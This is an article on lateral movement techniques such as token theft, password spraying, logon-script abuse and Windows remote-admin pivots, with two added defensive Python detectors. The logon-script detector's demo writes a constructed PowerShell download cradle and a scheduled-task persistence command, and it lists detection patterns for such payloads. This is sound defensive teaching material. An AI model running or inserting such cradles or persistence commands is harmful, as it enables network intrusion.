Ethical hacking: Lateral movement techniques by Blackhat Pakistan 2023
Anyone with at least a basic understanding of ethical hacking knows how heavily attackers rely on lateral movement to carry out intrusions on other people's computer systems. But what exactly are lateral movement techniques?
This article details some of the most popular lateral movement techniques used by adversaries. Ethical hackers should study these techniques so they can test their own organization's network against them. If you want a solid look at common lateral movement techniques, this article is for you.
A little about lateral movement
To give a quick definition: cybercriminals use lateral movement to move systematically through a network in search of sensitive data or assets, usually with data exfiltration as the goal.
Did you know that it takes an average of seven months for a data breach to be discovered, and that only 4% of those breaches are actually investigated?
Or that around 80% of an attacker's time inside a network is spent moving laterally? This is because attackers are mostly blind once inside a system and must move slowly to minimize detection. Just imagine the data that can be stolen, in addition to other damage, during that time. For anyone responsible for security, that is enough to lose sleep over.
PowerShell
PowerShell is the number one mechanism for implementing lateral movement techniques. Its object-oriented scripting makes stealing credentials, modifying system configuration and automating movement from system to system about as easy as it gets, and it ships with every modern Windows installation as a legitimate, signed administration tool. (It is no coincidence that some of the most readily available tools are the ones used for offensive techniques, lateral movement included.)
Technically it is a tool, not a technique, but it deserves a mention because of how over-represented it is in real intrusions. Ethical hackers would be smart to use it themselves.
Common lateral movement techniques
Lateral movement techniques are certainly not lacking in number or variety, but the basic strategy is the same: gain access to a low-privilege, low-security asset, escalate privileges, and scan the network for targets of interest.
Below is a list, in no particular order, of some of the most commonly used black hat techniques that ethical hackers can use to test their organization's systems and networks, following the old adage "know your enemy".
Token theft
Token theft is used in most attacks today and remains one of the most effective techniques. Using tools such as Windows Credential Editor and mimikatz, attackers locate the credential material of a logged-on service account in system memory (the LSASS process), use it to obtain or forge Kerberos tickets, and then present those tickets to gain elevated privileges such as domain administrator. Strictly speaking, Windows access tokens and Kerberos tickets are different objects, but they are harvested from memory in the same way and reused for the same purpose. This can often be done without detection, and frequently from PowerShell.
Stolen credentials
Stolen credentials are even more common than token theft. While organizations have responded to the attack landscape by investing in anti-malware capabilities, attackers have shifted their focus somewhat, moving towards actions that look like normal activity within the environment. Attackers know that once they hold legitimate credentials, not only is their job easier, but it is much harder to detect them, because every logon they perform is a valid one. In fact, credential theft is part of almost every attack strategy under the sun.
The most reliable methods of credential theft are reusing credentials leaked from another site (credential stuffing), phishing and social engineering, and brute-force attacks, including password spraying, which tries a few common passwords against many accounts to stay under lockout thresholds. Credentials obtained this way allow for smoother lateral movement within an organization's network.
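The credential-based techniques above (a stolen service-account credential, password spraying, and a stolen hash injected into a new logon session) leave a consistent footprint in the Windows Security log: failed logons (event ID 4625) from one source against many accounts, then successful network logons (4624 with logon type 3) by one account to many hosts in a short window, and occasionally a NewCredentials logon (4624 with logon type 9) on a workstation. The script below is an added example written for this article, not code from the original or from any tool it names. The event records are constructed, and the thresholds, window sizes and the type-9 heuristic are assumptions to tune for your own environment.

```python
"""Heuristic lateral-movement detection over Windows Security events.

Added example (not from the original article). Input is a list of dicts with
the fields a SIEM typically exports from event IDs 4624 (logon succeeded) and
4625 (logon failed). All records below are constructed for the demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def ev(time, event_id, host, user, src_ip, logon_type):
    """Build one event record; 'host' is the computer that logged the event."""
    return {"time": datetime.fromisoformat(time), "id": event_id, "host": host,
            "user": user, "src_ip": src_ip, "logon_type": logon_type}


# Constructed sample telemetry: hosts, users and addresses are made up.
EVENTS = [
    # Password spray: one source fails against six accounts in two minutes.
    ev("2023-05-01T09:00:05", 4625, "FS01", "alice", "10.0.5.23", 3),
    ev("2023-05-01T09:00:21", 4625, "FS01", "bob", "10.0.5.23", 3),
    ev("2023-05-01T09:00:40", 4625, "FS01", "carol", "10.0.5.23", 3),
    ev("2023-05-01T09:01:02", 4625, "FS01", "dave", "10.0.5.23", 3),
    ev("2023-05-01T09:01:30", 4625, "FS01", "erin", "10.0.5.23", 3),
    ev("2023-05-01T09:01:55", 4625, "FS01", "frank", "10.0.5.23", 3),
    # A stolen service-account credential then works and fans out across hosts.
    ev("2023-05-01T09:05:10", 4624, "FS01", "svc_backup", "10.0.5.23", 3),
    ev("2023-05-01T09:06:02", 4624, "FS02", "svc_backup", "10.0.5.23", 3),
    ev("2023-05-01T09:07:45", 4624, "DC01", "svc_backup", "10.0.5.23", 3),
    ev("2023-05-01T09:09:13", 4624, "APP01", "svc_backup", "10.0.5.23", 3),
    # Benign: carol mounts two file shares from her own workstation.
    ev("2023-05-01T09:03:00", 4624, "FS01", "carol", "10.0.7.9", 3),
    ev("2023-05-01T09:04:10", 4624, "FS02", "carol", "10.0.7.9", 3),
    # Benign: bob logs on at the console (logon type 2 is interactive).
    ev("2023-05-01T08:55:00", 4624, "WS03", "bob", "-", 2),
    # NewCredentials logon (type 9): produced by runas /netonly and by tools
    # that inject a stolen hash into a new logon session. Worth a manual look.
    ev("2023-05-01T09:04:30", 4624, "WS07", "alice", "::1", 9),
]


def _windowed_distinct(records, key, value, window, threshold):
    """Group records by key(); report groups in which at least `threshold`
    distinct value()s occur inside some time window of length `window`."""
    groups = defaultdict(list)
    for rec in records:
        groups[key(rec)].append(rec)
    hits = {}
    for group_key, recs in groups.items():
        recs.sort(key=lambda r: r["time"])
        for i, start in enumerate(recs):
            seen = set()
            for rec in recs[i:]:
                if rec["time"] - start["time"] > window:
                    break
                seen.add(value(rec))
            if len(seen) >= threshold:
                hits[group_key] = seen
                break
    return hits


def find_password_spray(events, min_accounts=5, window=timedelta(minutes=5)):
    """Sources whose failed logons touch many distinct accounts quickly."""
    failed = [e for e in events if e["id"] == 4625]
    return _windowed_distinct(failed, key=lambda e: e["src_ip"],
                              value=lambda e: e["user"], window=window,
                              threshold=min_accounts)


def find_logon_fanout(events, min_hosts=3, window=timedelta(minutes=10)):
    """(user, source) pairs whose network logons reach many hosts quickly."""
    network = [e for e in events if e["id"] == 4624 and e["logon_type"] == 3]
    return _windowed_distinct(network, key=lambda e: (e["user"], e["src_ip"]),
                              value=lambda e: e["host"], window=window,
                              threshold=min_hosts)


def find_newcredentials_logons(events):
    """Logon type 9 events; a heuristic lead, not proof of pass-the-hash."""
    return [e for e in events if e["id"] == 4624 and e["logon_type"] == 9]


if __name__ == "__main__":
    for src, users in find_password_spray(EVENTS).items():
        print(f"spray from {src}: {sorted(users)}")
    for (user, src), hosts in find_logon_fanout(EVENTS).items():
        print(f"fan-out by {user} from {src}: {sorted(hosts)}")
    for e in find_newcredentials_logons(EVENTS):
        print(f"NewCredentials logon for {e['user']} on {e['host']} at {e['time']}")
```

On the constructed data the spray from 10.0.5.23 and the svc_backup fan-out are flagged while carol's two share mounts are not. Real environments need an allow-list for scanners, backup servers and jump hosts, which legitimately fan out every night; the point of the window-plus-distinct-count shape is that it catches the burst rather than any single valid logon, which is exactly what stolen credentials are designed to hide behind.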
Login scripts
Windows runs logon scripts whenever a user logs on to a computer. These scripts can launch other programs, perform administrative tasks and report information back to servers on the network. If attackers can write to these scripts, they can inject their own code and gain persistence on the compromised system.
Lateral movement comes into play when the logon scripts are stored on a central server, typically the domain controllers' NETLOGON share: the injected code then executes on every machine where a user runs that script, and attackers ride it to reach systems across the network.
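A defender's counterpart to the logon-script abuse described above, as an added example that is not part of the original article: keep a hash baseline of the scripts on the central share, diff it on a schedule, and scan any new or changed script for the download cradles and persistence commands an attacker typically injects. A temporary directory, its file contents and the "tampering" step are constructed stand-ins for a NETLOGON share, and the regex list is a starting point rather than a complete signature set.

```python
"""Integrity check for centrally stored logon scripts.

Added example, not from the original article. A temporary directory stands in
for the domain's NETLOGON share; all scripts and the tampering are constructed.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Patterns an injected payload commonly carries. Extend for your environment.
SUSPICIOUS = [
    re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I),
    re.compile(r"-(enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"certutil(\.exe)?\s+-urlcache", re.I),
    re.compile(r"schtasks(\.exe)?\s+/create", re.I),
    re.compile(r"\bnet\s+user\s+\S+\s+\S+\s+/add", re.I),
]


def hash_tree(root: Path) -> dict:
    """Map each file under root (relative POSIX path) to its SHA-256 hex digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_baseline(baseline: dict, current: dict) -> dict:
    """Report scripts added, removed or changed since the baseline was taken."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "modified": sorted(name for name in common if baseline[name] != current[name]),
    }


def scan_script(path: Path) -> list:
    """Return (line number, pattern) for each line matching a suspicious pattern."""
    hits = []
    for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
        for pattern in SUSPICIOUS:
            if pattern.search(line):
                hits.append((lineno, pattern.pattern))
                break
    return hits


def demo():
    """Baseline a fake share, tamper with it, then diff and scan the changes."""
    with tempfile.TemporaryDirectory() as tmp:
        share = Path(tmp)
        (share / "login.bat").write_text(
            "@echo off\nnet use H: \\\\fs01\\home\\%USERNAME%\n")
        (share / "drives.vbs").write_text(
            'Set net = CreateObject("WScript.Network")\n'
            'net.MapNetworkDrive "S:", "\\\\fs01\\shared"\n')
        baseline = hash_tree(share)  # in practice: stored off-host and signed

        # Constructed tampering: a download cradle appended to an existing
        # script, plus a new script that registers a scheduled task.
        with (share / "login.bat").open("a") as f:
            f.write('powershell -w hidden -c "IEX (New-Object Net.WebClient)'
                    ".DownloadString('http://10.0.5.23/a.ps1')\"\n")
        (share / "update.ps1").write_text(
            "schtasks /create /tn Updater /tr C:\\Users\\Public\\u.exe /sc onlogon\n")

        changes = diff_baseline(baseline, hash_tree(share))
        findings = {name: scan_script(share / name)
                    for name in changes["added"] + changes["modified"]}
        return changes, findings


if __name__ == "__main__":
    changes, findings = demo()
    print("changes:", changes)
    for name, hits in findings.items():
        for lineno, pattern in hits:
            print(f"{name}:{lineno} matches /{pattern}/")
```

The baseline must live somewhere the attacker who can write to the share cannot also rewrite, otherwise they simply re-baseline after injecting. Pair the diff with the share's own audit trail (who wrote the file and when), since a legitimate change by an administrator and an injected cradle look identical to a hash comparison.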
Other lateral movement techniques
Lateral movement techniques are varied, to say the least, and attackers are resourceful in exploiting the state of the systems (especially Windows) that most organizations use. The techniques differ, but they use many of the same corridors to move within the network. These include:
- Vulnerability Exploitation
- Removable media
- Exploitation of application deployment software
- Abuse of Windows features and services
Wait a minute, did I just say Windows features and services? I did. This is the scariest part for an organization's network, because these features and services run 24/7 and are relied on every day, so an attacker using them blends in with normal administration. They include (non-exhaustive list):
- Remote Desktop (RDP): an interactive logon to the target with stolen credentials
- Server Message Block (SMB): administrative shares such as ADMIN$ and C$ for copying payloads and reading files
- Service Control Manager (SCM): creating and starting a service on the remote host, the PsExec pattern
- Windows Management Instrumentation (WMI): remote process creation, for example via the Win32_Process class
- Task Scheduler: registering a task on the remote host that runs the payload
- Windows Remote Management (WinRM): PowerShell remoting (Enter-PSSession, Invoke-Command)
- DCOM (Distributed Component Object Model): activating a COM object on the remote host that can execute commands
Mobile lateral movement
Mobile technology is not spared from the onslaught of lateral movement techniques. The two most common techniques are listed below.
Attack on PC via USB connection
Attackers are adept at using Android devices in their attacks, and lateral movement is part of that game plan. Simply put, attackers can escalate privileges on a mobile device and then program it to impersonate other USB devices (a keyboard, for instance) in order to attack the computer to which it is physically connected. This technique has not yet been observed on iOS.
Leverage corporate resources
Attackers can also exploit a mobile device's access to an organization's network resources through a local network connection or a virtual private network (VPN). The best example of this is DressCode, a family of Android malware that turns the infected device into a general-purpose tunnel (a SOCKS proxy) that adversaries can use to reach systems on the internal network.
Conclusion
Lateral movement in network and system attacks is the equivalent of physical movement in a burglary. A thief needs to move freely around the premises to carry out the break-in, and attackers need the same kind of mobility to see what is on the network while avoiding detection.
Since the average attack goes undetected for seven months, lateral movement is as important for staying hidden as it is for network reconnaissance. Ethical hackers should learn to use these lateral movement techniques within their own network to get a better idea of how real attackers would behave once inside.
Sources
- The Top 20 Lateral Movement Tactics, Smokescreen
- Hacking Happens: Stolen Credentials, Immunio
- Lateral Movement, MITRE
- Lateral Movement (Mobile), MITRE
- Logon Scripts, MITRE